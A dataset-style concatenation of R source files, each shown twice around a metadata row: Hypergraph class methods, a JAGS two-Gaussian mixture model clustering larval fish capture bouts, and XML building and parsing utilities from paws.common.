        stop(paste(msg, paste(dQuote(missingNodes), collapse=" "), sep="\n"))
    }
    TRUE
}
addDefaultHyperedgeLabels <- function(hyperedges) {
    ## Give every unlabelled hyperedge a default label equal to its position
    ## in the list (as a character string); already-labelled hyperedges are
    ## left untouched. Returns the (possibly updated) list.
    for (idx in seq_along(hyperedges)) {
        edge <- hyperedges[[idx]]
        currentLabel <- label(edge)
        hasLabel <- !is.null(currentLabel) && length(currentLabel) >= 1 && currentLabel != ""
        if (!hasLabel) {
            label(edge) <- as.character(idx)
            hyperedges[[idx]] <- edge
        }
    }
    hyperedges
}
## Accessor: the list of Hyperedge objects in the hypergraph.
setMethod("hyperedges", signature(.Object="Hypergraph"),
          function(.Object) .Object@hyperedges)
## Accessor: the label of each hyperedge (via the label() generic).
setMethod("hyperedgeLabels", signature(.Object="Hypergraph"),
          function(.Object) sapply(.Object@hyperedges, label))
## Accessor: the character vector of node names (graph::nodes generic).
setMethod(graph::nodes, signature(object="Hypergraph"), function(object)
          object@nodes)
## Accessor: the number of nodes (graph::numNodes generic).
setMethod(graph::numNodes, signature(object="Hypergraph"),
          function(object) length(object@nodes))
## Incidence matrix of the hypergraph: rows are nodes, columns are
## hyperedges; delegates to createInciMat().
setMethod("inciMat", signature(.Object="Hypergraph"),
          function(.Object) {
              nds <- nodes(.Object)
              hEdgeList <- hyperedges(.Object)
              createInciMat(nds, hEdgeList)
          })
setMethod("inciMat2HG", signature(.Object="matrix"),
          function(.Object){
              ## Rebuild a Hypergraph from a 0/1 incidence matrix: each
              ## column becomes a hyperedge over the row names whose entry
              ## is 1 (hyperedge list built via l2hel()).
              nodeNames <- rownames(.Object)
              memberLists <- apply(.Object, 2, function(column) {
                  names(which(column == 1))
              })
              Hypergraph(nodeNames, l2hel(memberLists))
          })
createInciMat <- function(nodes, edgeList) {
    ## Build the node-by-hyperedge incidence matrix: entry [i, j] is 1 when
    ## node i belongs to hyperedge j (membership via the nodes() generic),
    ## and 0 otherwise. Row names are the node names, column names the
    ## hyperedge labels.
    inciMat <- matrix(0, nrow=length(nodes), ncol=length(edgeList))
    ## seq_along() instead of 1:length(): the original 1:length(edgeList)
    ## evaluated to c(1, 0) for an empty edge list and then failed when
    ## indexing edgeList[[1]]; seq_along() yields an empty loop instead.
    for (j in seq_along(edgeList)) {
        col <- as.numeric(nodes %in% nodes(edgeList[[j]]))
        inciMat[, j] <- col
    }
    rownames(inciMat) <- nodes
    if (length(edgeList) > 0)
        colnames(inciMat) <- sapply(edgeList, label)
    inciMat
}
setMethod("toGraphNEL", signature(.Object="Hypergraph"),
          function(.Object) {
              ## Convert the hypergraph to its bipartite graphNEL
              ## representation: one vertex per node plus one vertex per
              ## hyperedge, with a weight-1 edge between a node and every
              ## hyperedge that contains it.
              hEdges <- hyperedges(.Object)
              hEdgeNames <- names(hEdges)
              if (is.null(hEdgeNames))
                ## seq_along() instead of 1:length(): for an edge-free
                ## hypergraph the original produced c("1", "0").
                hEdgeNames <- as.character(seq_along(hEdges))
              ## Hyperedge vertex names must not collide with node names.
              if (any(hEdgeNames %in% nodes(.Object)))
                stop("hyperedge names must be distinct from node names")
              bpgNodes <- c(nodes(.Object), hEdgeNames)
              ## Edges from each hyperedge vertex to its member nodes.
              heEdgeL <- lapply(hEdges, function(x) {
                  list(edges=match(nodes(x), bpgNodes), weights=rep(1, length(nodes(x))))})
              names(heEdgeL) <- hEdgeNames
              ## Edges from each node vertex back to the hyperedges that
              ## contain it, built by accumulation.
              hnEdgeL <- vector(mode="list", length=length(nodes(.Object)))
              names(hnEdgeL) <- nodes(.Object)
              ## seq_along() so an edge-free hypergraph yields an empty loop
              ## rather than indexing hEdges[[0]].
              for (i in seq_along(hEdges)) {
                  he <- hEdges[[i]]
                  heNode <- hEdgeNames[i]
                  heNodeIndex <- which(heNode == bpgNodes)
                  for (n in nodes(he))
                    hnEdgeL[[n]] <- append(hnEdgeL[[n]], heNodeIndex)
              }
              hnEdgeL <- lapply(hnEdgeL, function(x) {
                  list(edges=x, weights=rep(1, length(x)))})
              bpgEdgeL <- c(heEdgeL, hnEdgeL)
              new("graphNEL", bpgNodes, bpgEdgeL)
          })
| /HypergraphEvaluations/bioconductor/R/methods-Hypergraph.R | no_license | roscoe-casita/uoregon-thesis | R | false | false | 4,319 | r | setMethod("initialize", "Hypergraph", function(.Object, nodes=character(), hyperedges=list()) {
## Create a new hypergraph instance.
##
## nodes: character vector of node names
##
## hyperedges: a list of character vectors describing subsets of the nodes.
##
.Object@nodes = nodes
hypergraph:::checkValidHyperedges(hyperedges, nodes)
hyperedges <- addDefaultHyperedgeLabels(hyperedges)
.Object@hyperedges = hyperedges
.Object
})
Hypergraph <- function(nodes, hyperedges) {
## Convenience function to create Hypergraph instances
new("Hypergraph", nodes=nodes, hyperedges=hyperedges)
}
checkValidHyperedges <- function(hyperedges, nnodes) {
goodHyperedges <- unlist(lapply(hyperedges, is, "Hyperedge"))
if (!all(goodHyperedges))
stop("hyperedge list elements must be instances of the Hyperedge class.")
hyperedgeSet <- unlist(lapply(hyperedges, nodes))
unknownNodes <- !(hyperedgeSet %in% nnodes)
if (any(unknownNodes)) {
unknownNodes <- hyperedgeSet[unknownNodes]
msg <- paste("The hyperedge list is not valid because it",
"specifies nodes not in the node vector:")
msg <- paste(msg, paste(dQuote(unknownNodes), collapse=" "), sep="\n")
stop(msg)
}
TRUE
}
addDefaultHyperedgeLabels <- function(hyperedges) {
for (i in seq_len(length(hyperedges))) {
hEdge <- hyperedges[[i]]
lab <- label(hEdge)
if (is.null(lab) || length(lab) < 1 || lab == "") {
lab <- as.character(i)
label(hEdge) <- lab
hyperedges[[i]] <- hEdge
}
}
hyperedges
}
setMethod("hyperedges", signature(.Object="Hypergraph"),
function(.Object) .Object@hyperedges)
setMethod("hyperedgeLabels", signature(.Object="Hypergraph"),
function(.Object) sapply(.Object@hyperedges, label))
setMethod(graph::nodes, signature(object="Hypergraph"), function(object)
object@nodes)
setMethod(graph::numNodes, signature(object="Hypergraph"),
function(object) length(object@nodes))
setMethod("inciMat", signature(.Object="Hypergraph"),
function(.Object) {
nds <- nodes(.Object)
hEdgeList <- hyperedges(.Object)
createInciMat(nds, hEdgeList)
})
setMethod("inciMat2HG", signature(.Object="matrix"),
function(.Object){
rn <- rownames(.Object)
hgList <- apply(.Object, 2, function(x){
names(which(x == 1))
})
heList <- l2hel(hgList)
hg <- Hypergraph(rn, heList)
hg
})
createInciMat <- function(nodes, edgeList) {
inciMat <- matrix(0, nrow=length(nodes), ncol=length(edgeList))
for (j in 1:length(edgeList)) {
col <- as.numeric(nodes %in% nodes(edgeList[[j]]))
inciMat[, j] <- col
}
rownames(inciMat) <- nodes
colnames(inciMat) <- sapply(edgeList, label)
inciMat
}
setMethod("toGraphNEL", signature(.Object="Hypergraph"),
function(.Object) {
hEdges <- hyperedges(.Object)
hEdgeNames <- names(hEdges)
if (is.null(hEdgeNames))
hEdgeNames <- as.character(1:length(hEdges))
if (any(hEdgeNames %in% nodes(.Object)))
stop("hyperedge names must be distinct from node names")
bpgNodes <- c(nodes(.Object), hEdgeNames)
heEdgeL <- lapply(hEdges, function(x) {
list(edges=match(nodes(x), bpgNodes), weights=rep(1, length(nodes(x))))})
names(heEdgeL) <- hEdgeNames
hnEdgeL <- vector(mode="list", length=length(nodes(.Object)))
names(hnEdgeL) <- nodes(.Object)
for (i in 1:length(hEdges)) {
he <- hEdges[[i]]
heNode <- hEdgeNames[i]
heNodeIndex <- which(heNode == bpgNodes)
for (n in nodes(he))
hnEdgeL[[n]] <- append(hnEdgeL[[n]], heNodeIndex)
}
hnEdgeL <- lapply(hnEdgeL, function(x) {
list(edges=x, weights=rep(1, length(x)))})
bpgEdgeL <- c(heEdgeL, hnEdgeL)
new("graphNEL", bpgNodes, bpgEdgeL)
})
|
### \author Kostas Lagogiannis 2019-04-17
## Figure 4 of manuscript - Clustering of capture bouts
## This is a mixture of two Gaussians Model for Clustering Capture speed (fast/ slow), based on Speed & Distance from Prey
## The covariances also of the model also show the relationship between the capture bout speed and distance to prey
## Points are assigned to the fast cluster if their posterior prob of occupying that cluster is above 0.7 (minClusterLikelyhood) (see addClusterColumns function)
library(rjags)
library(runjags)
library(ggplot2) ##install.packages("ggplot2")
library(ggExtra)## install.packages("ggExtra") ##devtools::install_github("daattali/ggExtra").
library(ggpubr) ##install.packages("ggpubr")
source("common_lib.R")
## JAGS model: a two-component bivariate-Gaussian mixture over
## (distance-to-prey, capture-speed) pairs. mID[i] is the latent cluster
## membership of bout i (drawn Bernoulli(0.5)); pS is the proportion of
## bouts in the second (high-speed) component. x_rand synthesizes draws
## from each fitted component. The model text is data (a JAGS program),
## so it is kept byte-for-byte.
strmodel_capspeedVsDistance <- "
var x_rand[2,2];
model {
##Draw capt speed from 2d gaussian
for (i in 1:N)
{
##Draw from gaussian model as determined by mod flag
c[i,1:2] ~ dmnorm(mu[mID[i]+1,],prec[mID[i]+1, , ]) ## data in column 1 and 2
mID[i] ~ dbern(0.5) ##Se Gaussian class membership randomly
}
## ????XXXX Fit Bernouli distribution on Number of Hunt |Events that have a high-speed strike ??
## We used a normal for Probability of Strike Swim
pS ~ dnorm(sum(mID)/N,1000)T(0,1)
mStrikeCount ~ dbin(pS,N )
##Covariance matrix and its inverse -> the precision matrix
## for each Gaussian in the mixture (1 and 2)
for (g in 1:2)
{
prec[g,1:2,1:2] <- inverse(cov[g,,])
cov[g,1,1] <- sigma[g,1]*sigma[g,1]
cov[g,1,2] <- sigma[g,1]*sigma[g,2]*rho[g]
cov[g,2,1] <- cov[g,1,2]
cov[g,2,2] <- sigma[g,2]*sigma[g,2]
## Priors
sigma[g,1] ~ dunif(0,1) ##dist prey - Keep it broad within the expected limits
rho[g] ~ dunif(-1,1) ##The covar coefficient
}
## Low Speed Captcha cluster
mu[1,1] ~ dnorm(0.5,0.01)T(0.0,) ##Distance prey
mu[1,2] ~ dnorm(5,1)T(0,) ##cap speed
sigma[1,2] ~ dunif(0,2) ##the low cap speed sigma
## High speed Capture Cluster
mu[2,1] ~ dnorm(0.5,0.01)T(0.0,) ##Distance prey ##precision=1/sigma^2
mu[2,2] ~ dnorm(35,1)T(mu[1,2],) ##cap speed
sigma[2,2] ~ dunif(0,10) ##the high cap speed sigma
## Synthesize data from the distribution
x_rand[1,] ~ dmnorm(mu[1,],prec[1,,])
x_rand[2,] ~ dmnorm(mu[2,],prec[2,,])
} "
## MCMC sampler settings passed to jags.samples() below.
steps <- 5500   # samples drawn per chain
thin <- 2       # thinning interval
chains <- 3     # number of parallel chains (was `chains = 3`; use <- like the rest of the file)
## Model variables monitored during sampling.
str_vars <- c("mu","rho","sigma","cov","x_rand","mID","mStrikeCount","pS")
## Load behavioural data of each rearing group (LF/NF/DF).
## (paste0() around a single literal was a no-op and has been dropped.)
ldata_LF <- readRDS(file = "dat/huntEpisodeDataMergedWithLarvalSuccess_LF.rds")
ldata_NF <- readRDS(file = "dat/huntEpisodeDataMergedWithLarvalSuccess_NF.rds")
ldata_DF <- readRDS(file = "dat/huntEpisodeDataMergedWithLarvalSuccess_DF.rds")
## Convert to a convenient data.frame format for selecting columns.
distVsSpeed_LF <- data.frame(unlist(ldata_LF$c))
distVsSpeed_NF <- data.frame(unlist(ldata_NF$c))
distVsSpeed_DF <- data.frame(unlist(ldata_DF$c))
### RUN MODEL on Each Group independently###
## Live Fed (LF) group: compile the mixture model against the LF bouts,
## burn in 500 iterations, then draw `steps` samples per chain.
## (`quiet = F` became `quiet = FALSE`, and `draw_* =` became `<-`.)
jags_model_LF <- jags.model(textConnection(strmodel_capspeedVsDistance),
                            data = list(N = NROW(distVsSpeed_LF),
                                        c = cbind(dist = distVsSpeed_LF$DistanceToPrey, speed = distVsSpeed_LF$CaptureSpeed)),
                            n.adapt = 500, n.chains = chains, quiet = FALSE)
update(jags_model_LF, 500)
draw_LF <- jags.samples(jags_model_LF, steps, thin = thin, variable.names = str_vars)
## Not Fed (NF) group.
## NOTE(review): unlike the LF/DF fits, this update() call has no explicit
## burn-in length, and the NF/DF fits hard-code n.chains = 3 and thin = 2
## instead of reusing `chains`/`thin`. The values coincide, so behaviour is
## kept as-is -- confirm whether the asymmetry is intentional.
jags_model_NF <- jags.model(textConnection(strmodel_capspeedVsDistance),
                            data = list(N = NROW(distVsSpeed_NF),
                                        c = cbind(dist = distVsSpeed_NF$DistanceToPrey, speed = distVsSpeed_NF$CaptureSpeed)),
                            n.adapt = 500, n.chains = 3, quiet = FALSE)
update(jags_model_NF)
draw_NF <- jags.samples(jags_model_NF, steps, thin = 2, variable.names = str_vars)
## Dry Fed (DF) group.
jags_model_DF <- jags.model(textConnection(strmodel_capspeedVsDistance),
                            data = list(N = NROW(distVsSpeed_DF),
                                        c = cbind(dist = distVsSpeed_DF$DistanceToPrey, speed = distVsSpeed_DF$CaptureSpeed)),
                            n.adapt = 500, n.chains = 3, quiet = FALSE)
update(jags_model_DF, 500)
draw_DF <- jags.samples(jags_model_DF, steps, thin = 2, variable.names = str_vars)
## Plot the Gaussian cluster models and data coloured according to
## fast/slow cluster membership - as in Fig 4 of the manuscript.
## (plotClusteredData / plotCaptureSpeedFit are presumably defined in
## common_lib.R, sourced at the top of this script -- confirm.)
plotClusteredData(distVsSpeed_NF,draw_NF)
plotClusteredData(distVsSpeed_LF,draw_LF)
plotClusteredData(distVsSpeed_DF,draw_DF)
## Extra validation plot:
## check how the clustering model splits the distribution of capture
## speeds of each group, three panels side by side.
par(mar = c(3.9,4.3,1,1))
layout(matrix(c(1,2,3),1,3, byrow = FALSE))
npchain<-3  # number of chains to overlay in each fit plot
plotCaptureSpeedFit(distVsSpeed_NF,draw_NF,1,npchain)
#title(main="Model capture Speed")
plotCaptureSpeedFit(distVsSpeed_LF,draw_LF,2,npchain)
plotCaptureSpeedFit(distVsSpeed_DF,draw_DF,3,npchain)
############### END ###
| /stat_ClusterCaptureBouts.r | permissive | dafishcode/ontogenyofhunting_pub | R | false | false | 4,965 | r | ### \author Kostas Lagogiannis 2019-04-17
## Figure 4 of manuscript - Clustering of capture bouts
## This is a mixture of two Gaussians Model for Clustering Capture speed (fast/ slow), based on Speed & Distance from Prey
## The covariances also of the model also show the relationship between the capture bout speed and distance to prey
## Points are assigned to the fast cluster if their posterior prob of occupying that cluster is above 0.7 (minClusterLikelyhood) (see addClusterColumns function)
library(rjags)
library(runjags)
library(ggplot2) ##install.packages("ggplot2")
library(ggExtra)## install.packages("ggExtra") ##devtools::install_github("daattali/ggExtra").
library(ggpubr) ##install.packages("ggpubr")
source("common_lib.R")
# JAGS model source (a string, not R code -- do not edit it as R).
# Two-component bivariate-Gaussian mixture over (distance-to-prey,
# capture-speed) pairs: mID[i] is each bout's latent fast/slow cluster
# label, pS tracks the fraction of bouts assigned to the second cluster,
# and x_rand draws synthetic points from each fitted component.
# Component 2's speed mean is truncated above component 1's, making
# component 2 the "fast" cluster by construction.
strmodel_capspeedVsDistance <- "
var x_rand[2,2];
model {
##Draw capt speed from 2d gaussian
for (i in 1:N)
{
##Draw from gaussian model as determined by mod flag
c[i,1:2] ~ dmnorm(mu[mID[i]+1,],prec[mID[i]+1, , ]) ## data in column 1 and 2
mID[i] ~ dbern(0.5) ##Se Gaussian class membership randomly
}
## ????XXXX Fit Bernouli distribution on Number of Hunt |Events that have a high-speed strike ??
## We used a normal for Probability of Strike Swim
pS ~ dnorm(sum(mID)/N,1000)T(0,1)
mStrikeCount ~ dbin(pS,N )
##Covariance matrix and its inverse -> the precision matrix
## for each Gaussian in the mixture (1 and 2)
for (g in 1:2)
{
prec[g,1:2,1:2] <- inverse(cov[g,,])
cov[g,1,1] <- sigma[g,1]*sigma[g,1]
cov[g,1,2] <- sigma[g,1]*sigma[g,2]*rho[g]
cov[g,2,1] <- cov[g,1,2]
cov[g,2,2] <- sigma[g,2]*sigma[g,2]
## Priors
sigma[g,1] ~ dunif(0,1) ##dist prey - Keep it broad within the expected limits
rho[g] ~ dunif(-1,1) ##The covar coefficient
}
## Low Speed Captcha cluster
mu[1,1] ~ dnorm(0.5,0.01)T(0.0,) ##Distance prey
mu[1,2] ~ dnorm(5,1)T(0,) ##cap speed
sigma[1,2] ~ dunif(0,2) ##the low cap speed sigma
## High speed Capture Cluster
mu[2,1] ~ dnorm(0.5,0.01)T(0.0,) ##Distance prey ##precision=1/sigma^2
mu[2,2] ~ dnorm(35,1)T(mu[1,2],) ##cap speed
sigma[2,2] ~ dunif(0,10) ##the high cap speed sigma
## Synthesize data from the distribution
x_rand[1,] ~ dmnorm(mu[1,],prec[1,,])
x_rand[2,] ~ dmnorm(mu[2,],prec[2,,])
} "
## Init datastruct that we pass to model ##
# Shared MCMC settings for every group's fit.
steps <- 5500  # MCMC iterations drawn per chain (before thinning)
thin <- 2  # keep every 2nd sample
chains = 3  # number of parallel MCMC chains
# Node names monitored in the posterior draws.
str_vars <- c("mu","rho","sigma","cov","x_rand","mID","mStrikeCount","pS")
## Load the per-group hunt-episode data (LF = live fed, NF = not fed,
## DF = dry fed).
ldata_LF <- readRDS(file = "dat/huntEpisodeDataMergedWithLarvalSuccess_LF.rds")
ldata_NF <- readRDS(file = "dat/huntEpisodeDataMergedWithLarvalSuccess_NF.rds")
ldata_DF <- readRDS(file = "dat/huntEpisodeDataMergedWithLarvalSuccess_DF.rds")
## Convert to data.frames so columns can be selected by name.
distVsSpeed_LF <- data.frame(unlist(ldata_LF$c))
distVsSpeed_NF <- data.frame(unlist(ldata_NF$c))
distVsSpeed_DF <- data.frame(unlist(ldata_DF$c))

## Fit the two-Gaussian mixture model to one group's (distance, speed)
## data and return the posterior samples of the monitored variables.
## Every group now uses the shared settings (`chains`, `steps`, `thin`)
## and the same 500-iteration burn-in; the original fitted NF/DF with
## hard-coded n.chains = 3 / thin = 2 and gave NF a default-length
## burn-in, silently diverging from the declared configuration.
fitCaptureMixture <- function(groupData) {
  model <- jags.model(
    textConnection(strmodel_capspeedVsDistance),
    data = list(
      N = NROW(groupData),
      c = cbind(dist = groupData$DistanceToPrey, speed = groupData$CaptureSpeed)
    ),
    n.adapt = 500, n.chains = chains, quiet = FALSE
  )
  update(model, 500)  # burn-in
  jags.samples(model, steps, thin = thin, variable.names = str_vars)
}

### RUN MODEL on each group independently ###
draw_LF <- fitCaptureMixture(distVsSpeed_LF)  # Live Fed
draw_NF <- fitCaptureMixture(distVsSpeed_NF)  # Not Fed
draw_DF <- fitCaptureMixture(distVsSpeed_DF)  # Dry Fed

## Plot the Gaussian cluster models and the data coloured by fast/slow
## cluster membership -- as in Fig 4 of the manuscript.
plotClusteredData(distVsSpeed_NF, draw_NF)
plotClusteredData(distVsSpeed_LF, draw_LF)
plotClusteredData(distVsSpeed_DF, draw_DF)

## Extra validation: how each fitted model splits the distribution of
## capture speeds of its group.
par(mar = c(3.9, 4.3, 1, 1))
layout(matrix(c(1, 2, 3), 1, 3, byrow = FALSE))
npchain <- 3
plotCaptureSpeedFit(distVsSpeed_NF, draw_NF, 1, npchain)
plotCaptureSpeedFit(distVsSpeed_LF, draw_LF, 2, npchain)
plotCaptureSpeedFit(distVsSpeed_DF, draw_DF, 3, npchain)
############### END ###
|
# Turn raw XML bytes into a nested R list: decode the bytes to UTF-8
# text, then parse that text.
decode_xml <- function(raw) {
  xml_to_list(raw_to_utf8(raw))
}
# Parse an XML string into a nested R list; empty input yields NULL.
xml_to_list <- function(value) {
  if (is_empty(value)) {
    return(NULL)
  }
  xml2::as_list(xml2::read_xml(value))
}
# Convert a list to XML text.
#
# Serializes `value` via xml2, deletes the trailing newline the
# serializer appends, and encodes any interior newlines as the XML
# character reference "&#10;" so they survive inside the document.
# (The original replacement string was a literal newline -- a no-op that
# contradicted its own "Keep other newlines" comment; the "&#10;" entity
# had evidently been decoded away.)
list_to_xml <- function(value) {
  value_xml <- xml2::as_xml_document(x = value)
  value_character <- as.character(value_xml, options = "no_declaration")
  value_character <- gsub("\\n$", "", value_character) # Delete trailing newline.
  value_character <- gsub("\\n", "&#10;", value_character) # Keep other newlines.
  return(value_character)
}
# Recursively stamp an `xmlns` attribute onto every element of a nested
# list (leaves included), returning the annotated copy.
add_xmlns <- function(xml_list, xmlns = "") {
  out <- xml_list
  attr(out, "xmlns") <- xmlns
  if (is.list(out)) {
    for (idx in seq_along(out)) {
      out[[idx]] <- add_xmlns(out[[idx]], xmlns)
    }
  }
  out
}
#-------------------------------------------------------------------------------
# Serialize `request$params` into an XML body and store it on both the
# request and its embedded http_request. Empty params produce "".
xml_build_body <- function(request) {
  params <- request$params
  body_xml <- ""
  if (!is_empty(params)) {
    location_name <- tag_get(params, "locationName")
    xmlns <- tag_get(params, "xmlURI")
    # A root location name wraps the params in a named Structure.
    if (location_name != "") {
      params <- Structure(
        init = params,
        .tags = list(locationName = location_name, xmlns = xmlns)
      )
    }
    body_list <- xml_build(params)
    if (length(body_list)) {
      if (xmlns != "") {
        body_list <- add_xmlns(body_list, xmlns)
      }
      body_xml <- list_to_xml(body_list)
    }
  }
  request$body <- body_xml
  request$http_request$body <- body_xml
  request
}
# Build the XML list form of `params`, dispatching on its shape type.
# Parameters with a non-body location are not serialized here.
xml_build <- function(params) {
  if (tag_get(params, "location") != "") {
    return(NULL)
  }
  switch(
    type(params),
    structure = xml_build_structure(params),
    list = xml_build_list(params),
    xml_build_scalar(params)
  )
}
# Build the XML list representation of a structure shape: every child is
# built recursively and stored under its serialized element name.
xml_build_structure <- function(params) {
  result <- list()
  for (name in names(params)) {
    child <- params[[name]]
    # Default the serialized element name to the R field name.
    if (tag_get(child, "locationName") == "") {
      child <- tag_add(child, list(locationName = name))
    }
    parsed <- xml_build(child)
    # Empty children are omitted from the document entirely.
    if (!is_empty(parsed)) {
      location_name <- tag_get(child, "locationName")
      if (location_name == "") location_name <- name
      flattened <- tag_get(child, "flattened") != ""
      if (flattened) {
        # Flattened members are spliced into the parent, not nested.
        result <- c(result, parsed)
      } else{
        result[[location_name]] <- parsed
      }
    }
  }
  return(result)
}
# Build the XML list form of a list shape. Flattened lists repeat the
# member's locationName; nested lists wrap each element in a
# locationNameList element (default "member").
xml_build_list <- function(params) {
  if (length(params) == 0) {
    return(list())
  }
  built <- lapply(params, xml_build)
  if (tag_get(params, "flattened") != "") {
    element_name <- tag_get(params, "locationName")
  } else {
    element_name <- tag_get(params, "locationNameList")
    if (element_name == "") {
      element_name <- "member"
    }
  }
  names(built) <- rep(element_name, length(built))
  built
}
# Serialize a scalar for XML output, converting per the shape's "type"
# tag. `unlist` collapses nested single-element lists so the value is a
# plain vector before conversion.
xml_build_scalar <- function(params) {
  values <- unlist(params)
  if (length(values) == 0) {
    return(NULL)
  }
  convert <- switch(
    tag_get(params, "type"),
    blob = raw_to_base64,
    boolean = convert_boolean,
    double = ,
    float = ,
    integer = ,
    long = as.numeric,
    timestamp = function(x) as_timestamp(x, format = "iso8601"),
    as.character
  )
  as.list(convert(values))
}
#-------------------------------------------------------------------------------
# Unmarshal parsed XML `data` into the shape described by `interface`.
# When `result_name` names a wrapper element present at the document
# root, parsing descends into that element first.
xml_unmarshal <- function(data, interface, result_name = NULL) {
  if (is.null(data)) {
    return(interface)
  }
  root <- data[[1]]
  wrapped <- !is.null(result_name) && result_name %in% names(root)
  if (wrapped) {
    root <- root[[result_name]]
  }
  xml_parse(root, interface)
}
# Unmarshal an error document into an Error object; returns NULL when
# the document carries neither an error code nor a message.
xml_unmarshal_error <- function(data, status_code) {
  error_response <- lapply(data[[1]]$Error, unlist)
  code <- error_response$Code
  message <- error_response$Message
  if (is.null(code) && is.null(message)) {
    return(NULL)
  }
  Error(code, message, status_code, error_response)
}
# Convert an API response node to the shape given in `interface`,
# dispatching on the interface's type; scalars are the fallback.
#
# e.g. convert EC2 API response
#   `list(reservationSet = "foo", nextToken = "bar")`
# to output shape
#   `list(Reservations = foo, NextToken = bar)`.
xml_parse <- function(node, interface) {
  switch(
    type(interface),
    structure = xml_parse_structure(node, interface),
    map = xml_parse_map(node, interface),
    list = xml_parse_list(node, interface),
    xml_parse_scalar(node, interface)
  )
}
# Parse an XML node into a structure shape, field by field.
xml_parse_structure <- function(node, interface) {
  payload <- tag_get(node, "payload")
  if (length(payload) > 0 && payload != "") {
    # NOTE(review): this reads the "payload" tag from the parsed XML
    # *node* (not from `interface`) and then recurses with that tag
    # value -- a string -- in place of `node`. Looks suspicious; confirm
    # against the tag conventions used by the rest of the package.
    result <- xml_parse_structure(payload, interface)
    return(result)
  }
  result <- interface
  for (name in names(interface)) {
    field <- interface[[name]]
    # Skip fields that don't come from the response body.
    if (tag_get(field, "location") != "") {
      next
    }
    # Element name in the XML: locationNameList for flattened lists,
    # otherwise locationName, falling back to the field name itself.
    node_name <- name
    flattened <- tag_get(field, "flattened") != ""
    if (flattened && tag_get(field, "locationNameList") != "") {
      node_name <- tag_get(field, "locationNameList")
    } else if (tag_get(field, "locationName") != "") {
      node_name <- tag_get(field, "locationName")
    }
    elem <- node[[node_name]]
    if (flattened) {
      # Flattened lists arrive as repeated sibling elements.
      elem <- node[names(node) == node_name]
    }
    parsed <- xml_parse(elem, field)
    result[[name]] <- parsed
  }
  return(result)
}
# Parse each child of `node` against the list's element interface.
# Scalar element types collapse to an atomic vector.
xml_parse_list <- function(node, interface) {
  if (length(node) == 0) {
    return(list())
  }
  element_interface <- interface[[1]]
  parsed <- lapply(unname(node), xml_parse, interface = element_interface)
  if (type(element_interface) == "scalar") {
    parsed <- unlist(parsed)
  }
  parsed
}
# Parse a map node. A map with several entries arrives as repeated
# identically-named children; a single entry arrives unwrapped and is
# wrapped here so both cases iterate the same way.
xml_parse_map <- function(node, interface) {
  if (length(node) == 0) {
    return(list())
  }
  entries <- if (length(unique(names(node))) == 1) node else list(node)
  result <- list()
  for (entry in entries) {
    result <- c(result, xml_parse_map_entry(entry, interface))
  }
  result
}
# Parse one map entry into a single-element named list. Key/value
# element names default to "key"/"value" unless overridden by tags.
xml_parse_map_entry <- function(node, interface) {
  key_field <- tag_get(interface, "locationNameKey")
  value_field <- tag_get(interface, "locationNameValue")
  if (key_field == "") key_field <- "key"
  if (value_field == "") value_field <- "value"
  out <- list()
  out[[unlist(node[[key_field]])]] <- xml_parse(node[[value_field]], interface[[1]])
  out
}
# Convert a scalar XML node to the R type named by the interface's
# "type" tag. `unlist` collapses xml2's nested representation
# (<foo>abc</foo> parses as `list(foo = list("abc"))`) to a vector.
xml_parse_scalar <- function(node, interface) {
  values <- unlist(node)
  convert <- switch(
    tag_get(interface, "type"),
    blob = base64_to_raw,
    boolean = as.logical,
    double = ,
    float = ,
    integer = ,
    long = as.numeric,
    timestamp = function(x) as_timestamp(x, format = "iso8601"),
    as.character
  )
  convert(values)
}
| /paws.common/R/xmlutil.R | permissive | williazo/paws | R | false | false | 7,825 | r | # Decode raw bytes XML into an R list object.
# Turn raw XML bytes into a nested R list: decode the bytes to UTF-8
# text, then parse that text.
decode_xml <- function(raw) {
  xml_to_list(raw_to_utf8(raw))
}
# Parse an XML string into a nested R list; empty input yields NULL.
xml_to_list <- function(value) {
  if (is_empty(value)) {
    return(NULL)
  }
  xml2::as_list(xml2::read_xml(value))
}
# Convert a list to XML text.
#
# Serializes `value` via xml2, deletes the trailing newline the
# serializer appends, and encodes any interior newlines as the XML
# character reference "&#10;" so they survive inside the document.
# (The original replacement string was a literal newline -- a no-op that
# contradicted its own "Keep other newlines" comment; the "&#10;" entity
# had evidently been decoded away.)
list_to_xml <- function(value) {
  value_xml <- xml2::as_xml_document(x = value)
  value_character <- as.character(value_xml, options = "no_declaration")
  value_character <- gsub("\\n$", "", value_character) # Delete trailing newline.
  value_character <- gsub("\\n", "&#10;", value_character) # Keep other newlines.
  return(value_character)
}
# Recursively stamp an `xmlns` attribute onto every element of a nested
# list (leaves included), returning the annotated copy.
add_xmlns <- function(xml_list, xmlns = "") {
  out <- xml_list
  attr(out, "xmlns") <- xmlns
  if (is.list(out)) {
    for (idx in seq_along(out)) {
      out[[idx]] <- add_xmlns(out[[idx]], xmlns)
    }
  }
  out
}
#-------------------------------------------------------------------------------
# Serialize `request$params` into an XML body and store it on both the
# request and its embedded http_request. Empty params produce "".
xml_build_body <- function(request) {
  params <- request$params
  body_xml <- ""
  if (!is_empty(params)) {
    location_name <- tag_get(params, "locationName")
    xmlns <- tag_get(params, "xmlURI")
    # A root location name wraps the params in a named Structure.
    if (location_name != "") {
      params <- Structure(
        init = params,
        .tags = list(locationName = location_name, xmlns = xmlns)
      )
    }
    body_list <- xml_build(params)
    if (length(body_list)) {
      if (xmlns != "") {
        body_list <- add_xmlns(body_list, xmlns)
      }
      body_xml <- list_to_xml(body_list)
    }
  }
  request$body <- body_xml
  request$http_request$body <- body_xml
  request
}
# Build the XML list form of `params`, dispatching on its shape type.
# Parameters with a non-body location are not serialized here.
xml_build <- function(params) {
  if (tag_get(params, "location") != "") {
    return(NULL)
  }
  switch(
    type(params),
    structure = xml_build_structure(params),
    list = xml_build_list(params),
    xml_build_scalar(params)
  )
}
# Build the XML list representation of a structure shape: every child is
# built recursively and stored under its serialized element name.
xml_build_structure <- function(params) {
  result <- list()
  for (name in names(params)) {
    child <- params[[name]]
    # Default the serialized element name to the R field name.
    if (tag_get(child, "locationName") == "") {
      child <- tag_add(child, list(locationName = name))
    }
    parsed <- xml_build(child)
    # Empty children are omitted from the document entirely.
    if (!is_empty(parsed)) {
      location_name <- tag_get(child, "locationName")
      if (location_name == "") location_name <- name
      flattened <- tag_get(child, "flattened") != ""
      if (flattened) {
        # Flattened members are spliced into the parent, not nested.
        result <- c(result, parsed)
      } else{
        result[[location_name]] <- parsed
      }
    }
  }
  return(result)
}
# Build the XML list form of a list shape. Flattened lists repeat the
# member's locationName; nested lists wrap each element in a
# locationNameList element (default "member").
